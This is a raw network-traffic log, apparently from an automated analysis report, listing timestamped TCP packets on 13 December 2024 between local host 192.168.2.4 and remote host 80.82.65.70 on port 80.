                                          Dec 13, 2024 08:36:30.983927011 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.987787008 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.987854958 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.987936020 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.988117933 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.996083975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.996155024 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.996211052 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.996452093 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.004456043 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.004561901 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.004565954 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.004614115 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.012980938 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.013035059 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.013082027 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.013267040 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.021275997 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.021317959 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.021337032 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.021357059 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.029730082 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.029788017 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.029808998 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.029860973 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.038060904 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.038152933 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.038160086 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.038199902 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.046471119 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.046538115 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.046658993 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.046700001 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.054886103 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.054977894 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.055008888 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.055192947 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.062503099 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.062568903 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.062669039 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.176426888 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.176465034 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.176523924 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.176572084 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.178939104 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.179008007 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.179049015 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.179279089 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.183938980 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.184001923 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.184037924 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.184227943 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.189052105 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.189112902 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.189141035 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.189191103 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.194051981 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.194148064 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.194169998 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.194214106 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.198766947 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.198931932 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.199002028 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.203716040 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.203775883 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.203850985 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.208409071 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.208513975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.208668947 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.213191986 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.213284969 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.213361979 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.218153954 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.218204975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.218286991 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.222785950 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.222906113 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.222974062 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.227659941 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.227798939 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.227869987 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.232458115 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.232508898 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.232575893 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.237205982 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.237349987 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.237425089 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.242019892 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.242130995 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.242197037 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.246823072 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.246982098 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.247072935 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.251619101 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.251712084 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.251770973 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.256406069 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.256531000 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.256597996 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.261214972 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.261334896 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.261399031 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.266110897 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.266189098 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.266220093 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.266272068 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.270828962 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.274329901 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.368453026 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.368474960 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.368535042 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.369582891 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.369647980 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.369692087 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.373588085 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.373791933 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.373822927 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.373847961 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.377610922 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.377661943 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.377703905 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.377743006 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.381649971 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.381751060 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.381781101 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.381795883 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.385654926 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.385698080 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.385727882 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.385756969 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.389424086 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.389508009 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.389535904 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.389781952 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.393001080 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.393071890 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.885379076 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.885685921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.885782957 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.889700890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.889811993 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.889811993 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.889976978 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.894187927 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.894308090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.894344091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.894364119 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.898631096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.898696899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.898755074 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.898798943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.903059006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.903450966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.940217018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.940288067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.940290928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.940335035 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.942425013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.942492962 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.995402098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.995443106 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.995502949 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:33.997100115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.997255087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:33.997304916 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.000622988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.000684977 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.000705957 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.001030922 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.004168034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.004234076 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.004265070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.004307032 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.006865025 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.006952047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.006980896 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.007021904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.009536028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.009571075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.009586096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.009629965 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.012181997 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.012240887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.012269974 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.012310028 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.014786005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.014858961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.014884949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.014928102 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.017378092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.017431974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.017586946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.017631054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.019948959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.019999027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.020025969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.020447969 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.022449017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.022502899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.022521019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.022564888 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.024882078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.025019884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.025100946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.025100946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.027395964 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.027451992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.027503014 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.029763937 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.029814005 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.029902935 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.029958010 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.032252073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.032340050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.032388926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.034687996 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.034787893 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.034843922 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.037158012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.037240982 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.037271023 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.037321091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.039777994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.039799929 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.039829969 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.039856911 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.042052984 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.042114973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.042149067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.042193890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.044538975 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.044687033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.044739008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.046982050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.047045946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.047092915 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.047142982 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.049412012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.049475908 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.049511909 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.049560070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.051868916 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.051938057 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.051948071 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.051995039 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.054354906 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.054408073 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.054408073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.054450989 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.056754112 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.056854963 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.056905985 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.059220076 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.059262991 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.059318066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.061629057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.061690092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.061721087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.061767101 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.064100027 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.064157009 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.064188957 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.064234018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.066553116 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.066622972 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.066656113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.066700935 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.068793058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.068901062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.068959951 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.071032047 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.071103096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.071139097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.071187973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.073323965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.073384047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.073396921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.073443890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.075614929 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.075663090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.075664043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.075717926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.077841043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.077903032 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.077904940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.077953100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.128725052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.128786087 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.128835917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.128876925 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.129839897 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.129890919 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.129973888 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.130013943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.132071972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.132129908 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.188554049 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.188620090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.188663006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.188704014 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.189212084 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.189259052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.189302921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.190684080 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.190747023 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.190783978 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.190826893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.192178965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.192262888 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.192332983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.192560911 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.193644047 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.193691015 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.193830967 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.194102049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.195120096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.195166111 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.195223093 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.195262909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.196620941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.196670055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.196729898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.196768999 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.198071003 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.198127031 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.198497057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.198632956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.199455023 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.199513912 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.199604034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.199734926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.200872898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.200922966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.200965881 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.201013088 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.202280998 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.202353954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.202358007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.202397108 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.203649044 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.203701019 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.203753948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.203805923 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.205051899 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.205104113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.205187082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.205229998 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.206453085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.206504107 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.206557035 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.206598997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.207876921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.207928896 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.207950115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.207992077 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.209228992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.209281921 CET4977280192.168.2.480.82.65.70
